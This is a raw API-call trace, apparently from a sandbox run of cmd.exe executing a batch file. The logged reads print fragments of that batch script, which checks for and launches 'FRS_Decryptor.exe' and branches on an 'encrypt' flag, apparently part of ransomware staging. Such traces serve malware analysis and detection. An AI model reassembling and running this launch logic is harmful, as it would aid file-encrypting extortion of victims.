_String2="HOMEPAT", _MaxCount=0x7) returned -5 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0088.947] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0088.947] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0088.947] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 3 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x36c, hThread=0x254, dwProcessId=0x5e8, dwThreadId=0x988)) returned 1 [0088.950] CloseHandle (hObject=0x254) returned 1 [0088.950] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0088.950] GetEnvironmentStringsW () returned 0xd30508* [0088.950] FreeEnvironmentStringsA (penv="=") returned 1 [0088.950] WaitForSingleObject (hHandle=0x36c, dwMilliseconds=0xffffffff) returned 0x0 [0091.019] GetExitCodeProcess (in: hProcess=0x36c, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0091.019] CloseHandle (hObject=0x36c) returned 1 [0091.019] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0091.019] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0091.019] GetEnvironmentStringsW () returned 0xd2c668* [0091.019] FreeEnvironmentStringsA (penv="=") returned 1 [0091.019] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0091.019] GetEnvironmentStringsW () returned 0xd30508* [0091.020] FreeEnvironmentStringsA (penv="=") returned 1 [0091.020] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0091.020] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0091.020] _close (_FileHandle=3) returned 0 [0091.020] _get_osfhandle (_FileHandle=1) returned 0x28 [0091.020] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0091.020] _get_osfhandle (_FileHandle=1) returned 0x28 [0091.020] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0091.020] _get_osfhandle (_FileHandle=0) returned 0x24 [0091.020] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0091.021] SetConsoleInputExeNameW () returned 0x1 [0091.021] GetConsoleOutputCP () returned 0x1b5 [0091.021] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0091.021] SetThreadUILanguage (LangId=0x0) returned 0x409 [0091.021] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x34c [0091.021] _open_osfhandle (_OSFileHandle=0x34c, _Flags=8) returned 3 [0091.021] _get_osfhandle (_FileHandle=3) returned 0x34c [0091.021] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0091.021] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0091.021] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e, lpOverlapped=0x0) returned 1 [0091.022] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2585, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0091.022] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims= \" %%i in ('tasklist^|find /i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 73 [0091.022] GetFileType (hFile=0x34c) returned 0x1 [0091.022] _get_osfhandle (_FileHandle=3) returned 0x34c [0091.022] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0091.022] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0091.022] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f02c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f02c*=0x55, lpOverlapped=0x0) returned 1 [0091.022] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0091.022] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=42, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%i\"==\"FRS_Decryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 42 [0091.022] GetFileType (hFile=0x34c) returned 0x1 [0091.022] _get_osfhandle (_FileHandle=3) returned 0x34c [0091.022] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0091.022] _tell (_FileHandle=3) returned 2627 [0091.022] _close (_FileHandle=3) returned 0 [0091.022] _wcsnicmp (_String1="delims= ", _String2="usebackq", _MaxCount=0x8) returned -17 [0091.022] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0091.022] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0091.022] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0091.022] _wpopen (_Command="tasklist|find /i \"FRS_Decryptor.exe\"", _Mode="rb") returned 0x76ea4c68 [0091.026] feof (_File=0x76ea4c68) returned 0 [0091.026] ferror (_File=0x76ea4c68) returned 0 [0091.026] fgets (in: _Buf=0xd818e0, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n", _File=0x76ea4c68) returned="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n" [0091.515] feof (_File=0x76ea4c68) returned 0 [0091.515] ferror (_File=0x76ea4c68) returned 0 [0091.515] fgets (in: _Buf=0xd83ef6, _MaxCount=434, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0091.550] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 0 [0091.550] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xd43ca6, cbMultiByte=78, lpWideCharStr=0xd43c58, cchWideChar=78 | out: lpWideCharStr="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n") returned 78 [0091.550] lstrcmpiW (lpString1="\"FRS_Decryptor.exe\"", lpString2="\"FRS_Decryptor.exe\"") returned 0 [0091.550] GetConsoleTitleW (in: lpConsoleTitle=0xc8ebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0091.551] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e900, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0091.551] _open_osfhandle (_OSFileHandle=0x2a0, _Flags=8) returned 3 [0091.551] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.551] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0091.551] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.551] GetFileSize (in: hFile=0x2a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0091.551] _wcsnicmp (_String1="4", _String2=":EOF", _MaxCount=0x4) returned -6 [0091.551] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.551] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0091.551] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.551] GetFileType (hFile=0x2a0) returned 0x1 [0091.551] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0091.551] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x2b, lpOverlapped=0x0) returned 1 [0091.551] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2662, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0091.551] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n") returned 35 [0091.551] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0091.551] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.551] GetFileType (hFile=0x2a0) returned 0x1 [0091.551] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0091.552] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x8, lpOverlapped=0x0) returned 1 [0091.552] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0091.552] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0091.552] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.552] GetFileType (hFile=0x2a0) returned 0x1 [0091.552] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0091.552] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x0, lpOverlapped=0x0) returned 1 [0091.552] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.552] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.552] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.552] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.552] GetFileType (hFile=0x2a0) returned 0x1 [0091.552] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.552] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.552] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0091.552] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@shift\r\n") returned 8 [0091.552] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0091.552] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.552] GetFileType (hFile=0x2a0) returned 0x1 [0091.552] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0091.552] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.552] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0091.552] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@echo off\r\nLES%\\FRS_Decryptor.exe\r\n") returned 11 [0091.552] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0091.552] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.552] GetFileType (hFile=0x2a0) returned 0x1 [0091.552] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0091.552] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.552] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0091.552] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0091.552] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0091.553] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.553] GetFileType (hFile=0x2a0) returned 0x1 [0091.553] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0091.553] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.553] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0091.553] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":1\r\no off\r\n") returned 4 [0091.553] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0091.553] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.553] GetFileType (hFile=0x2a0) returned 0x1 [0091.553] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0091.553] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.553] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0091.553] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"e\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\nl_flag.png\r\n") returned 73 [0091.553] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0091.553] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.553] GetFileType (hFile=0x2a0) returned 0x1 [0091.553] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0091.553] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.553] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0091.553] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="If \\\"%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 32 [0091.553] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0091.553] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.553] GetFileType (hFile=0x2a0) returned 0x1 [0091.553] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0091.553] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.553] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0091.553] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="cls\r\n%e%\\\"==\\\"encrypt\\\" goto 3\r\n") returned 5 [0091.553] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0091.553] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.553] GetFileType (hFile=0x2a0) returned 0x1 [0091.553] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0091.554] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.554] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0091.554] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 2\r\n\\\"==\\\"encrypt\\\" goto 3\r\n") returned 8 [0091.554] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0091.554] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.554] GetFileType (hFile=0x2a0) returned 0x1 [0091.554] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0091.554] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.554] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0091.554] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 2\r\n") returned 2 [0091.554] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0091.554] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.554] GetFileType (hFile=0x2a0) returned 0x1 [0091.554] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0091.554] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.554] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0091.554] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":2\r\n 2\r\n") returned 4 [0091.554] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0091.554] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.554] GetFileType (hFile=0x2a0) returned 0x1 [0091.554] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0091.554] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.554] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0091.554] MultiByteToWideChar (in: CodePage=0x1b5, 